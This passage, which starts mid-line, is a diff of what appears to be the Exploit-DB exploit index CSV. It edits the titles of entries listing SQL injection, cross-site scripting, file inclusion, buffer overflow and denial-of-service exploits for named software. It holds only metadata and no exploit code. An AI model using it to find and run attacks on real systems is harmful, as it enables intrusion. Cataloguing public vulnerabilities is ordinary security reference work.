Component SQL Injection Vulnerability",2008-02-19,S@BUN,php,webapps,0 31244,platforms/php/webapps/31244.txt,"Joomla! and Mambo com_iigcatalog Component - 'cat' Parameter SQL Injection Vulnerability",2008-02-19,S@BUN,php,webapps,0 31245,platforms/php/webapps/31245.txt,"Joomla! and Mambo com_formtool Component - 'catid' Parameter SQL Injection Vulnerability",2008-02-19,S@BUN,php,webapps,0 @@ -28090,7 +28090,7 @@ id,file,description,date,author,platform,type,port 31296,platforms/php/webapps/31296.txt,"Galore Simple Shop 3.1 - 'section' Parameter SQL Injection Vulnerability",2008-02-25,S@BUN,php,webapps,0 31297,platforms/php/webapps/31297.txt,"PHP-Nuke Sell Module - 'cid' Parameter SQL Injection Vulnerability",2008-02-25,"Aria-Security Team",php,webapps,0 31298,platforms/hardware/remote/31298.txt,"Packeteer PacketShaper and PolicyCenter 8.2.2 - 'FILELIST' Parameter Cross-Site Scripting Vulnerability",2008-02-25,nnposter,hardware,remote,0 -31299,platforms/jsp/webapps/31299.txt,"Alkacon OpenCms 7.0.3 - 'tree_files.jsp' Cross-Site Scripting Vulnerability",2008-02-25,nnposter,jsp,webapps,0 +31299,platforms/jsp/webapps/31299.txt,"Alkacon OpenCMS 7.0.3 - 'tree_files.jsp' Cross-Site Scripting Vulnerability",2008-02-25,nnposter,jsp,webapps,0 31300,platforms/windows/dos/31300.txt,"SurgeMail and WebMail <= 3.0 - 'Page' Command Remote Format String Vulnerability",2008-02-25,"Luigi Auriemma",windows,dos,0 31301,platforms/windows/dos/31301.txt,"SurgeMail 3.0 - Real CGI executables Remote Buffer Overflow Vulnerability",2008-02-25,"Luigi Auriemma",windows,dos,0 31302,platforms/windows/dos/31302.txt,"SurgeFTP 2.3a2 'Content-Length' Parameter NULL Pointer - Denial Of Service Vulnerability",2008-02-25,"Luigi Auriemma",windows,dos,0 @@ -28106,7 +28106,7 @@ id,file,description,date,author,platform,type,port 31312,platforms/php/webapps/31312.txt,"Barryvan Compo Manager 0.3 - 'main.php' Remote File Include Vulnerability",2008-02-28,MhZ91,php,webapps,0 31313,platforms/cgi/webapps/31313.txt,"Juniper Networks Secure Access 2000 Web - Root Path Disclosure Vulnerability",2008-02-28,"Richard Brain",cgi,webapps,0 31314,platforms/asp/webapps/31314.txt,"Flicks Software AuthentiX 6.3b1 - 'username' Parameter Multiple Cross-Site Scripting Vulnerabilities",2008-02-28,"William Hicks",asp,webapps,0 -31315,platforms/php/webapps/31315.txt,"XRMS 1.99.2 - CRM 'msg' Parameter Cross Site Scripting Vulnerability",2008-02-28,vijayv,php,webapps,0 +31315,platforms/php/webapps/31315.txt,"XRms 1.99.2 - CRM 'msg' Parameter Cross Site Scripting Vulnerability",2008-02-28,vijayv,php,webapps,0 31316,platforms/php/webapps/31316.txt,"Centreon 1.4.2 - color_picker.php Multiple Cross-Site Scripting Vulnerabilities",2008-02-28,"Julien CAYSSOL",php,webapps,0 31317,platforms/php/webapps/31317.txt,"netOffice Dwins 1.3 - Authentication Bypass Vulnerability and Arbitrary File Upload Vulnerability",2008-02-29,RawSecurity.org,php,webapps,0 31318,platforms/php/webapps/31318.txt,"Centreon 1.4.2.3 - index.php Local File Include Vulnerability",2008-02-29,JosS,php,webapps,0 @@ -28149,7 +28149,7 @@ id,file,description,date,author,platform,type,port 31357,platforms/php/webapps/31357.txt,"WordPress 2.3.2 - wp-admin/invites.php to Parameter XSS",2008-03-07,Doz,php,webapps,0 31358,platforms/php/webapps/31358.txt,"Specimen Image Database - taxonservice.php dir Parameter Remote File Inclusion",2008-03-07,ZoRLu,php,webapps,0 31359,platforms/windows/remote/31359.html,"Microsoft Internet Explorer 7.0 Combined JavaScript and XML Remote Information Disclosure Vulnerability",2008-03-07,"Ronald van den Heetkamp",windows,remote,0 -31360,platforms/windows/dos/31360.txt,"MailEnable 3.13 and Prior - IMAP Service Multiple Remote Vulnerabilities",2008-03-07,"Luigi Auriemma",windows,dos,0 +31360,platforms/windows/dos/31360.txt,"MailEnable <= 3.13 - IMAP Service Multiple Remote Vulnerabilities",2008-03-07,"Luigi Auriemma",windows,dos,0 31361,platforms/windows/dos/31361.txt,"Microsoft Office 2000/2003/2004/XP - File Memory Corruption Vulnerability",2008-03-07,anonymous,windows,dos,0 31362,platforms/multiple/remote/31362.txt,"Neptune Web Server 3.0 - 404 Error Page Cross Site Scripting Vulnerability",2008-03-07,NetJackal,multiple,remote,0 31363,platforms/windows/dos/31363.txt,"Panda Internet Security/Antivirus+Firewall 2008 - CPoint.sys Memory Corruption Vulnerability",2008-03-08,"Tobias Klein",windows,dos,0 @@ -28164,7 +28164,7 @@ id,file,description,date,author,platform,type,port 31372,platforms/php/webapps/31372.txt,"EasyImageCatalogue 1.31 - thumber.php dir Parameter XSS",2008-03-12,ZoRLu,php,webapps,0 31373,platforms/php/webapps/31373.txt,"EasyImageCatalogue 1.31 - describe.php d Parameter XSS",2008-03-12,ZoRLu,php,webapps,0 31374,platforms/php/webapps/31374.txt,"EasyImageCatalogue 1.31 - addcomment.php d Parameter XSS",2008-03-12,ZoRLu,php,webapps,0 -31375,platforms/php/webapps/31375.txt,"Drake CMS 0.4.11 RC8 - 'd_root' Parameter Local File Include Vulnerability",2008-03-10,THE_MILLER,php,webapps,0 +31375,platforms/php/webapps/31375.txt,"Drake CMS 0.4.11 RC8 - 'd_root' Parameter Local File Include Vulnerability",2008-03-10,THE_MILLER,php,webapps,0 31376,platforms/multiple/dos/31376.txt,"Acronis True Image Echo Enterprise Server 9.5.0.8072 - Multiple Remote Denial of Service Vulnerabilities",2008-03-10,"Luigi Auriemma",multiple,dos,0 31377,platforms/php/webapps/31377.txt,"PHP-Nuke Hadith Module - 'cat' Parameter SQL Injection Vulnerability",2008-03-10,Lovebug,php,webapps,0 31378,platforms/multiple/dos/31378.txt,"RemotelyAnywhere 8.0.668 - 'Accept-Charset' Parameter NULL Pointer Denial Of Service Vulnerability",2008-03-10,"Luigi Auriemma",multiple,dos,0 @@ -28212,14 +28212,14 @@ id,file,description,date,author,platform,type,port 31425,platforms/hardware/webapps/31425.txt,"D-Link DIR-100 - Multiple Vulnerabilities",2014-02-05,"Felix Richter",hardware,webapps,80 31426,platforms/php/webapps/31426.txt,"Plogger 1.0 (RC1) - Multiple Vulnerabilities",2014-02-05,killall-9,php,webapps,80 31427,platforms/php/webapps/31427.txt,"ownCloud 6.0.0a - Multiple Vulnerabilities",2014-02-05,absane,php,webapps,80 -31429,platforms/multiple/dos/31429.py,"VLC 2.1.2 - (.asf file) Crash PoC",2014-02-05,Saif,multiple,dos,0 +31429,platforms/multiple/dos/31429.py,"VLC 2.1.2 - (.asf file) Crash PoC",2014-02-05,Saif,multiple,dos,0 31430,platforms/hardware/webapps/31430.txt,"Inteno DG301 - Command Injection",2014-02-05,"Juan J. Guelfo",hardware,webapps,80 31431,platforms/php/webapps/31431.txt,"ImpressCMS 1.3.5 - Multiple Vulnerabilities",2014-02-05,"Pedro Ribeiro",php,webapps,80 31432,platforms/linux/remote/31432.rb,"SkyBlueCanvas CMS - Remote Code Execution",2014-02-05,metasploit,linux,remote,0 31433,platforms/multiple/remote/31433.rb,"Apache Tomcat Manager - Application Upload Authenticated Code Execution",2014-02-05,metasploit,multiple,remote,80 31434,platforms/java/remote/31434.rb,"Apache Struts Developer Mode OGNL Execution",2014-02-05,metasploit,java,remote,8080 31435,platforms/php/webapps/31435.py,"Joomla JomSocial Component 2.6 - Code Execution Exploit",2014-02-05,"Matias Fontanini",php,webapps,80 -31436,platforms/php/webapps/31436.txt,"Pandora FMS 5.0RC1 - Remote Command Injection",2014-02-05,xistence,php,webapps,80 +31436,platforms/php/webapps/31436.txt,"Pandora Fms 5.0RC1 - Remote Command Injection",2014-02-05,xistence,php,webapps,80 31438,platforms/java/webapps/31438.txt,"IBM Rational ClearQuest 7.0 - Multiple Parameters Multiple Cross-Site Scripting Vulnerabilities",2008-03-19,sasquatch,java,webapps,0 31439,platforms/php/webapps/31439.txt,"cPanel 11.18.3 - List Directories and Folders Information Disclosure Vulnerability",2008-03-18,Linux_Drox,php,webapps,0 31440,platforms/linux/dos/31440.txt,"Asterisk 1.4.x - RTP Codec Payload Handling Multiple Buffer Overflow Vulnerabilities",2008-03-18,"Mu Security research",linux,dos,0 @@ -28257,7 +28257,7 @@ id,file,description,date,author,platform,type,port 31472,platforms/php/webapps/31472.txt,"cPanel 11.18.3/11.21 - 'manpage.html' Cross-Site Scripting Vulnerability",2008-03-22,Linux_Drox,php,webapps,0 31473,platforms/osx/remote/31473.html,"Apple Safari 3.1 - Window.setTimeout Variant Content Spoofing Vulnerability",2008-03-22,"Juan Pablo Lopez Yacubian",osx,remote,0 31474,platforms/windows/remote/31474.py,"Mitsubishi Electric GB-50A - Multiple Remote Authentication Bypass Vulnerabilities",2008-03-22,"Chris Withers",windows,remote,0 -31475,platforms/jsp/webapps/31475.txt,"Alkacon OpenCms 7.0.3 - 'users_list.jsp' Multiple Cross-Site Scripting Vulnerabilities",2008-03-24,nnposter,jsp,webapps,0 +31475,platforms/jsp/webapps/31475.txt,"Alkacon OpenCMS 7.0.3 - 'users_list.jsp' Multiple Cross-Site Scripting Vulnerabilities",2008-03-24,nnposter,jsp,webapps,0 31476,platforms/php/webapps/31476.txt,"Efestech E-Kontor - 'id' Parameter SQL Injection Vulnerability",2008-03-24,RMx,php,webapps,0 31477,platforms/multiple/dos/31477.txt,"snircd 1.3.4 And ircu 2.10.12.12 - 'set_user_mode' Remote Denial of Service Vulnerability",2008-03-24,"Chris Porter",multiple,dos,0 31478,platforms/hardware/dos/31478.txt,"Linksys SPA-2102 Phone Adapter Packet Handling - Denial of Service Vulnerability",2008-03-24,sipherr,hardware,dos,0 @@ -28300,7 +28300,7 @@ id,file,description,date,author,platform,type,port 31515,platforms/php/webapps/31515.txt,"osCommerce 2.3.3.4 - (geo_zones.php, zID param) - SQL Injection Vulnerability",2014-02-07,"Ahmed Aboul-Ela",php,webapps,80 31516,platforms/php/webapps/31516.txt,"Serendipity 1.7.5 (Backend) - Multiple Vulnerabilities",2014-02-07,"Stefan Schurtz",php,webapps,80 31517,platforms/php/webapps/31517.txt,"CTERA 3.2.29.0 and 3.2.42.0 - Stored XSS",2014-02-07,"Luigi Vezzoso",php,webapps,80 -31518,platforms/linux/remote/31518.rb,"Pandora FMS - Remote Code Execution",2014-02-07,metasploit,linux,remote,8023 +31518,platforms/linux/remote/31518.rb,"Pandora Fms - Remote Code Execution",2014-02-07,metasploit,linux,remote,8023 31519,platforms/hardware/remote/31519.rb,"Android Browser and WebView addJavascriptInterface - Code Execution",2014-02-07,metasploit,hardware,remote,0 31520,platforms/php/webapps/31520.txt,"AuraCMS 2.3 - Multiple Vulnerabilities",2014-02-07,"High-Tech Bridge SA",php,webapps,80 31521,platforms/php/webapps/31521.txt,"doorGets CMS 5.2 - SQL Injection Vulnerability",2014-02-07,"High-Tech Bridge SA",php,webapps,80 @@ -28370,9 +28370,9 @@ id,file,description,date,author,platform,type,port 31590,platforms/php/webapps/31590.txt,"DivXDB 2002 0.94b - Multiple Cross-Site Scripting Vulnerabilities",2008-04-02,ZoRLu,php,webapps,0 31591,platforms/linux/remote/31591.txt,"LANDesk Management Suite 8.80.1.1 - PXE TFTP Service Directory Traversal Vulnerability",2008-04-02,"Luigi Auriemma",linux,remote,0 31592,platforms/windows/dos/31592.txt,"Microsoft Internet Explorer 8 Beta 1 - XDR Prototype Hijacking Denial of Service Vulnerability",2008-04-02,"The Hacker Webzine",windows,dos,0 -31593,platforms/windows/dos/31593.txt,"Microsoft Internet Explorer 8 Beta 1 - 'ieframe.dll' Script Injection Vulnerability",2008-04-02,"The Hacker Webzine",windows,dos,0 +31593,platforms/windows/dos/31593.txt,"Microsoft Internet Explorer 8 Beta 1 - 'ieframe.dll' Script Injection Vulnerability",2008-04-02,"The Hacker Webzine",windows,dos,0 31594,platforms/linux/dos/31594.html,"Opera Web Browser 9.26 - Multiple Security Vulnerabilities",2008-04-03,"Michal Zalewski",linux,dos,0 -31595,platforms/php/webapps/31595.txt,"Joomla! and Mambo Joomlearn LMS Component - 'cat' Parameter SQL Injection Vulnerability",2008-04-03,The-0utl4w,php,webapps,0 +31595,platforms/php/webapps/31595.txt,"Joomla! and Mambo Joomlearn Lms Component - 'cat' Parameter SQL Injection Vulnerability",2008-04-03,The-0utl4w,php,webapps,0 31596,platforms/php/webapps/31596.txt,"mcGallery 1.1 - admin.php lang Parameter XSS",2008-04-03,K-9999,php,webapps,0 31597,platforms/php/webapps/31597.txt,"mcGallery 1.1 - index.php lang Parameter XSS",2008-04-03,K-9999,php,webapps,0 31598,platforms/php/webapps/31598.txt,"mcGallery 1.1 - sess.php lang Parameter XSS",2008-04-03,K-9999,php,webapps,0 @@ -28588,7 +28588,7 @@ id,file,description,date,author,platform,type,port 31814,platforms/windows/remote/31814.py,"Mini HTTPD 1.21 - Stack Buffer Overflow POST Exploit",2014-02-22,"OJ Reeves",windows,remote,0 31815,platforms/linux/dos/31815.html,"libxslt XSL <= 1.1.23 - File Processing Buffer Overflow Vulnerability",2008-05-21,"Anthony de Almeida Lopes",linux,dos,0 31816,platforms/java/webapps/31816.txt,"SAP Web Application Server 7.0 - '/sap/bc/gui/sap/its/webgui/' Cross-Site Scripting Vulnerability",2008-05-21,DSecRG,java,webapps,0 -31817,platforms/multiple/dos/31817.html,"Mozilla Firefox 2.0.0.14 - JSframe Heap Corruption Denial of Service Vulnerability",2008-05-21,0x000000,multiple,dos,0 +31817,platforms/multiple/dos/31817.html,"Mozilla Firefox 2.0.0.14 - JSframe Heap Corruption Denial of Service Vulnerability",2008-05-21,0x000000,multiple,dos,0 31818,platforms/windows/dos/31818.sh,"vsftpd FTP Server 2.0.5 - 'deny_file' Option Remote Denial of Service Vulnerability (1)",2008-05-21,"Martin Nagy",windows,dos,0 31819,platforms/windows/dos/31819.pl,"vsftpd FTP Server 2.0.5 - 'deny_file' Option Remote Denial of Service Vulnerability (2)",2008-05-21,"Praveen Darshanam",windows,dos,0 31820,platforms/unix/remote/31820.pl,"IBM Lotus Sametime <= 8.0 - Multiplexer Buffer Overflow Vulnerability",2008-05-21,"Manuel Santamarina Suarez",unix,remote,0 @@ -28628,7 +28628,7 @@ id,file,description,date,author,platform,type,port 31855,platforms/php/webapps/31855.txt,"Tr Script News 2.1 - 'news.php' Cross-Site Scripting Vulnerability",2008-05-27,ZoRLu,php,webapps,0 31856,platforms/windows/dos/31856.html,"CA Internet Security Suite - 'UmxEventCli.dll' ActiveX Control Arbitrary File Overwrite Vulnerability",2008-05-28,Nine:Situations:Group,windows,dos,0 31857,platforms/php/webapps/31857.txt,"Joomla! and Mambo Artists Component - 'idgalery' Parameter SQL Injection Vulnerability",2008-05-28,Cr@zy_King,php,webapps,0 -31858,platforms/php/webapps/31858.txt,"Calcium 3.10/4.0.4 'Calcium40.pl' - Cross Site Scripting Vulnerability",2008-05-28,"Marvin Simkin",php,webapps,0 +31858,platforms/php/webapps/31858.txt,"Calcium 3.10/4.0.4 'Calcium40.pl' - Cross Site Scripting Vulnerability",2008-05-28,"Marvin Simkin",php,webapps,0 31859,platforms/asp/webapps/31859.txt,"JustPORTAL 1.0 - 'site' Parameter Multiple SQL Injection Vulnerabilities",2008-05-29,"Ugurcan Engin",asp,webapps,0 31860,platforms/asp/webapps/31860.txt,"Proje ASP Portal 2.0 - 'id' Parameter Multiple SQL Injection Vulnerabilities",2008-05-29,"Ugurcan Engin",asp,webapps,0 31861,platforms/asp/webapps/31861.txt,"dvbbs 8.2 - 'login.asp' Multiple SQL Injection Vulnerabilities",2008-05-29,hackerbinhphuoc,asp,webapps,0 @@ -28657,7 +28657,7 @@ id,file,description,date,author,platform,type,port 31884,platforms/hardware/dos/31884.txt,"Linksys WRH54G 1.1.3 - Wireless-G Router Malformed HTTP Request Denial of Service Vulnerability",2008-06-05,dubingyao,hardware,dos,0 31885,platforms/hardware/remote/31885.txt,"F5 FirePass 6.0.2.3 - /vdesk/admincon/webyfiers.php css_exceptions Parameter XSS",2008-06-05,nnposter,hardware,remote,0 31886,platforms/hardware/remote/31886.txt,"F5 FirePass 6.0.2.3 - /vdesk/admincon/index.php sql_matchscope Parameter XSS",2008-06-05,nnposter,hardware,remote,0 -31887,platforms/linux/remote/31887.txt,"ALFTP FTP Client 4.1/5.0 - 'LIST' Command Directory Traversal Vulnerability",2008-06-06,"Tan Chew Keong",linux,remote,0 +31887,platforms/linux/remote/31887.txt,"ALFTP FTP Client 4.1/5.0 - 'LIST' Command Directory Traversal Vulnerability",2008-06-06,"Tan Chew Keong",linux,remote,0 31888,platforms/php/webapps/31888.txt,"SchoolCenter 7.5 - Multiple Cross Site Scripting Vulnerabilities",2008-06-06,Doz,php,webapps,0 31889,platforms/novell/dos/31889.pl,"Novell GroupWise Messenger 2.0 - Client Buffer Overflow Vulnerabilities",2008-07-02,"Francisco Amato",novell,dos,0 31890,platforms/multiple/remote/31890.txt,"Diigo Toolbar and Diigolet Comment Feature - HTML Injection and Information Disclosure Vulnerabilities",2008-06-20,"Ferruh Mavituna",multiple,remote,0 @@ -28717,19 +28717,19 @@ id,file,description,date,author,platform,type,port 31945,platforms/php/webapps/31945.txt,"PEGames Multiple Cross Site Scripting Vulnerabilities",2008-06-23,CraCkEr,php,webapps,0 31946,platforms/php/webapps/31946.txt,"IDMOS 1.0 'site_absolute_path' Parameter Multiple Remote File Include Vulnerabilities",2008-06-23,CraCkEr,php,webapps,0 31947,platforms/php/webapps/31947.txt,"EXP Shop 1.0 Joomla! 'com_expshop' Component SQL Injection Vulnerability",2008-06-22,His0k4,php,webapps,0 -31948,platforms/php/webapps/31948.txt,"Open Digital Assets Repository System 1.0.2 Remote File Include Vulnerability",2008-06-22,CraCkEr,php,webapps,0 +31948,platforms/php/webapps/31948.txt,"Open Digital Assets Repository System 1.0.2 - Remote File Include Vulnerability",2008-06-22,CraCkEr,php,webapps,0 31949,platforms/php/webapps/31949.txt,"Chipmunk Blog members.php membername Parameter XSS",2008-06-23,sl4xUz,php,webapps,0 31950,platforms/php/webapps/31950.txt,"Chipmunk Blog comments.php membername Parameter XSS",2008-06-23,sl4xUz,php,webapps,0 31951,platforms/php/webapps/31951.txt,"Chipmunk Blog photos.php membername Parameter XSS",2008-06-23,sl4xUz,php,webapps,0 31952,platforms/php/webapps/31952.txt,"Chipmunk Blog archive.php membername Parameter XSS",2008-06-23,sl4xUz,php,webapps,0 31953,platforms/php/webapps/31953.txt,"Chipmunk Blog cat.php membername Parameter XSS",2008-06-23,sl4xUz,php,webapps,0 -31954,platforms/php/webapps/31954.txt,"Benja CMS 0.1 /admin/admin_edit_submenu.php URL XSS",2008-06-23,"CWH Underground",php,webapps,0 +31954,platforms/php/webapps/31954.txt,"Benja CMS 0.1 - /admin/admin_edit_submenu.php URL XSS",2008-06-23,"CWH Underground",php,webapps,0 31955,platforms/php/webapps/31955.txt,"Benja CMS 0.1 /admin/admin_new_submenu.php URL XSS",2008-06-23,"CWH Underground",php,webapps,0 -31956,platforms/php/webapps/31956.txt,"Benja CMS 0.1 /admin/admin_edit_topmenu.php URL XSS",2008-06-23,"CWH Underground",php,webapps,0 +31956,platforms/php/webapps/31956.txt,"Benja CMS 0.1 - /admin/admin_edit_topmenu.php URL XSS",2008-06-23,"CWH Underground",php,webapps,0 31957,platforms/multiple/dos/31957.txt,"World in Conflict 1.008 - NULL Pointer Remote Denial of Service Vulnerability",2008-06-23,"Luigi Auriemma",multiple,dos,0 31958,platforms/multiple/dos/31958.txt,"SunAge 1.8.1 - Multiple Denial of Service Vulnerabilities",2008-06-23,"Luigi Auriemma",multiple,dos,0 31959,platforms/linux/local/31959.txt,"Perl 'rmtree()' Function Local Insecure Permissions Vulnerability",2008-06-23,"Frans Pop",linux,local,0 -31960,platforms/php/webapps/31960.txt,"A+ PHP Scripts News Management System 0.3 Multiple Input Validation Vulnerabilities",2008-06-23,CraCkEr,php,webapps,0 +31960,platforms/php/webapps/31960.txt,"A+ PHP Scripts News Management System 0.3 - Multiple Input Validation Vulnerabilities",2008-06-23,CraCkEr,php,webapps,0 31961,platforms/php/webapps/31961.txt,"GDL 4.2 - Multiple Vulnerabilities",2014-02-27,ByEge,php,webapps,80 31962,platforms/ios/webapps/31962.txt,"Bluetooth Photo Share Pro 2.0 iOS - Multiple Vulnerabilities",2014-02-27,Vulnerability-Lab,ios,webapps,8080 31963,platforms/php/webapps/31963.txt,"E-topbiz Link ADS 1 'out.php' SQL Injection Vulnerability",2008-06-24,"Hussin X",php,webapps,0 @@ -28807,9 +28807,9 @@ id,file,description,date,author,platform,type,port 32040,platforms/php/webapps/32040.txt,"SpagoBI 4.0 - Arbitrary XSS File Upload",2014-03-03,"Christian Catalano",php,webapps,0 32041,platforms/windows/local/32041.pl,"ALLPlayer 5.8.1 - (.m3u file) Buffer Overflow (SEH)",2014-03-03,"Gabor Seljan",windows,local,0 32045,platforms/php/webapps/32045.txt,"eSyndiCat 2.2 'register.php' Multiple Cross Site Scripting Vulnerabilities",2008-07-10,Fugitif,php,webapps,0 -32046,platforms/jsp/webapps/32046.txt,"IBM Maximo 4.1/ 5.2 'debug.jsp' HTML Injection And Information Disclosure Vulnerabilities",2008-07-11,"Deniz Cevik",jsp,webapps,0 +32046,platforms/jsp/webapps/32046.txt,"IBM Maximo 4.1/ 5.2 - 'debug.jsp' HTML Injection And Information Disclosure Vulnerabilities",2008-07-11,"Deniz Cevik",jsp,webapps,0 32047,platforms/php/webapps/32047.txt,"Hudson 1.223 'q' Parameter Cross-Site Scripting Vulnerability",2008-07-11,syniack,php,webapps,0 -32048,platforms/osx/remote/32048.html,"Apple iPhone and iPod Touch Prior to Version 2.0 Multiple Remote Vulnerabilities",2008-07-11,"Hiromitsu Takagi",osx,remote,0 +32048,platforms/osx/remote/32048.html,"Apple iPhone and iPod Touch < 2.0 - Multiple Remote Vulnerabilities",2008-07-11,"Hiromitsu Takagi",osx,remote,0 32049,platforms/windows/remote/32049.txt,"Microsoft Internet Explorer 6.0 New ActiveX Object String Concatenation Memory Corruption Vulnerability",2008-07-14,0x000000,windows,remote,0 32050,platforms/windows/local/32050.py,"Calavera UpLoader 3.5 - SEH Buffer Overflow",2014-03-04,"Daniel la calavera",windows,local,0 32051,platforms/php/webapps/32051.php,"Pubs Black Cat [The Fun] 'browse.groups.php' SQL Injection Vulnerability",2008-07-14,RMx,php,webapps,0 @@ -28845,12 +28845,12 @@ id,file,description,date,author,platform,type,port 32083,platforms/php/webapps/32083.txt,"Def_Blog 1.0.3 comlook.php article Parameter SQL Injection",2008-07-18,"CWH Underground",php,webapps,0 32084,platforms/multiple/remote/32084.txt,"SmbClientParser 2.7 Perl Module Remote Command Execution Vulnerability",2008-07-18,"Jesus Olmos Gonzalez",multiple,remote,0 32085,platforms/php/webapps/32085.txt,"phpFreeChat 1.1 'demo21_with_hardocded_urls.php' Cross Site Scripting Vulnerability",2008-07-18,ahmadbady,php,webapps,0 -32086,platforms/multiple/dos/32086.c,"SWAT 4 Multiple Denial Of Service Vulnerabilities",2008-07-20,"Luigi Auriemma",multiple,dos,0 +32086,platforms/multiple/dos/32086.c,"SWAT 4 - Multiple Denial Of Service Vulnerabilities",2008-07-20,"Luigi Auriemma",multiple,dos,0 32087,platforms/php/webapps/32087.txt,"EasyBookMarker 4.0 'ajaxp_backend.php' Cross-Site Scripting Vulnerability",2008-07-21,Dr.Crash,php,webapps,0 -32088,platforms/php/webapps/32088.pl,"EasyDynamicPages 3.0 Multiple SQL Injection and Cross-Site Scripting Vulnerabilities",2008-07-21,Dr.Crash,php,webapps,0 +32088,platforms/php/webapps/32088.pl,"EasyDynamicPages 3.0 - Multiple SQL Injection and Cross-Site Scripting Vulnerabilities",2008-07-21,Dr.Crash,php,webapps,0 32089,platforms/php/webapps/32089.pl,"EasyPublish 3.0 'read' Parameter Multiple SQL Injection and Cross-Site Vulnerabilities",2008-07-21,Dr.Crash,php,webapps,0 32090,platforms/php/webapps/32090.txt,"Maran PHP Blog 'comments.php' Cross-Site Scripting Vulnerability",2008-07-21,Dr.Crash,php,webapps,0 -32091,platforms/php/webapps/32091.txt,"MyBlog 0.9.8 Multiple Remote Information Disclosure Vulnerabilities",2008-07-21,"AmnPardaz Security Research Team",php,webapps,0 +32091,platforms/php/webapps/32091.txt,"MyBlog 0.9.8 - Multiple Remote Information Disclosure Vulnerabilities",2008-07-21,"AmnPardaz Security Research Team",php,webapps,0 32092,platforms/php/webapps/32092.txt,"Flip 3.0 'config.php' Remote File Include Vulnerability",2008-07-21,Cru3l.b0y,php,webapps,0 32093,platforms/php/webapps/32093.txt,"phpKF 'forum_duzen.php' SQL Injection Vulnerability",2008-07-21,U238,php,webapps,0 32094,platforms/cgi/webapps/32094.pl,"HiFriend 'cgi-bin/hifriend.pl' Open Email Relay Vulnerability",2008-07-21,Perforin,cgi,webapps,0 @@ -28885,11 +28885,11 @@ id,file,description,date,author,platform,type,port 32123,platforms/php/webapps/32123.txt,"miniBB RSS 2.0 Plugin Multiple Remote File Include Vulnerabilities",2008-07-29,"Ghost Hacker",php,webapps,0 32124,platforms/windows/remote/32124.txt,"Eyeball MessengerSDK 'CoVideoWindow.ocx' 5.0.907 ActiveX Control Remote Buffer Overflow Vulnerability",2008-07-29,"Edi Strosar",windows,remote,0 32125,platforms/multiple/dos/32125.txt,"Unreal Tournament 2004 - NULL Pointer Remote Denial of Service Vulnerability",2008-07-30,"Luigi Auriemma",multiple,dos,0 -32126,platforms/php/webapps/32126.txt,"ScrewTurn Software ScrewTurn Wiki 2.0.x 'System Log' Page HTML Injection Vulnerability",2008-05-11,Portcullis,php,webapps,0 +32126,platforms/php/webapps/32126.txt,"ScrewTurn Software ScrewTurn Wiki 2.0.x - 'System Log' Page HTML Injection Vulnerability",2008-05-11,Portcullis,php,webapps,0 32127,platforms/multiple/dos/32127.txt,"Unreal Tournament 3 - Denial Of Service And Memory Corruption Vulnerabilities",2008-07-30,"Luigi Auriemma",multiple,dos,0 32128,platforms/php/webapps/32128.txt,"MJGUEST 6.8 'guestbook.js.php' Cross Site Scripting Vulnerability",2008-07-30,DSecRG,php,webapps,0 32129,platforms/windows/remote/32129.cpp,"BlazeVideo HDTV Player 3.5 PLF File Stack Buffer Overflow Vulnerability",2008-07-30,"fl0 fl0w",windows,remote,0 -32130,platforms/php/webapps/32130.txt,"DEV Web Management System 1.5 Multiple Input Validation Vulnerabilities",2008-07-30,Dr.Crash,php,webapps,0 +32130,platforms/php/webapps/32130.txt,"DEV Web Management System 1.5 - Multiple Input Validation Vulnerabilities",2008-07-30,Dr.Crash,php,webapps,0 32131,platforms/php/webapps/32131.txt,"ClipSharePro <= 4.1 - Local File Inclusion",2014-03-09,"Saadi Siddiqui",php,webapps,0 32132,platforms/windows/remote/32132.py,"GetGo Download Manager 4.9.0.1982 - HTTP Response Header Buffer Overflow Remote Code Execution",2014-03-09,"Julien Ahrens",windows,remote,0 32133,platforms/linux/remote/32133.txt,"libxslt 1.1.x - RC4 Encryption and Decryption Functions Buffer Overflow Vulnerability",2008-07-31,"Chris Evans",linux,remote,0 @@ -28925,7 +28925,7 @@ id,file,description,date,author,platform,type,port 32165,platforms/linux/remote/32165.txt,"XAMPP Linux 1.6 - ming.php text Parameter XSS",2008-08-04,"Khashayar Fereidani",linux,remote,0 32166,platforms/linux/remote/32166.txt,"XAMPP Linux 1.6 - iart.php text Parameter XSS",2008-08-04,"Khashayar Fereidani",linux,remote,0 32167,platforms/multiple/remote/32167.txt,"8E6 Technologies R3000 Host Header Internet Filter Security Bypass Vulnerability",2008-08-05,nnposter,multiple,remote,0 -32168,platforms/php/webapps/32168.txt,"Pluck 4.5.2 Multiple Cross Site Scripting Vulnerabilities",2008-08-05,"Khashayar Fereidani",php,webapps,0 +32168,platforms/php/webapps/32168.txt,"Pluck 4.5.2 - Multiple Cross Site Scripting Vulnerabilities",2008-08-05,"Khashayar Fereidani",php,webapps,0 32169,platforms/php/webapps/32169.txt,"Crafty Syntax Live Help 2.14.6 'livehelp_js.php' Cross-Site Scripting Vulnerability",2008-08-05,CoRSaNTuRK,php,webapps,0 32170,platforms/php/webapps/32170.txt,"Softbiz Image Gallery index.php Multiple Parameter XSS",2008-08-05,sl4xUz,php,webapps,0 32171,platforms/php/webapps/32171.txt,"Softbiz Image Gallery images.php Multiple Parameter XSS",2008-08-05,sl4xUz,php,webapps,0 @@ -28938,19 +28938,19 @@ id,file,description,date,author,platform,type,port 32178,platforms/php/webapps/32178.txt,"Softbiz Image Gallery browsecats.php msg Parameter XSS",2008-08-05,sl4xUz,php,webapps,0 32179,platforms/php/webapps/32179.txt,"POWERGAP Shopsystem 's03.php' SQL Injection Vulnerability",2008-08-05,"Rohit Bansal",php,webapps,0 32180,platforms/php/webapps/32180.txt,"Chupix CMS Contact Module 0.1 'index.php' Multiple Local File Include Vulnerabilities",2008-08-06,casper41,php,webapps,0 -32181,platforms/php/webapps/32181.txt,"Battle.net Clan Script 1.5.x 'index.php' Multiple SQL Injection Vulnerabilities",2008-08-06,IRCRASH,php,webapps,0 +32181,platforms/php/webapps/32181.txt,"Battle.net Clan Script 1.5.x - 'index.php' Multiple SQL Injection Vulnerabilities",2008-08-06,IRCRASH,php,webapps,0 32182,platforms/php/webapps/32182.txt,"phpKF-Portal 1.10 baslik.php tema_dizin Parameter Traversal Local File Inclusion",2008-08-06,KnocKout,php,webapps,0 32183,platforms/php/webapps/32183.txt,"phpKF-Portal 1.10 anket_yonetim.php portal_ayarlarportal_dili Parameter Traversal Local File Inclusion",2008-08-06,KnocKout,php,webapps,0 32184,platforms/asp/webapps/32184.txt,"KAPhotoservice order.asp page Parameter XSS",2008-08-06,by_casper41,asp,webapps,0 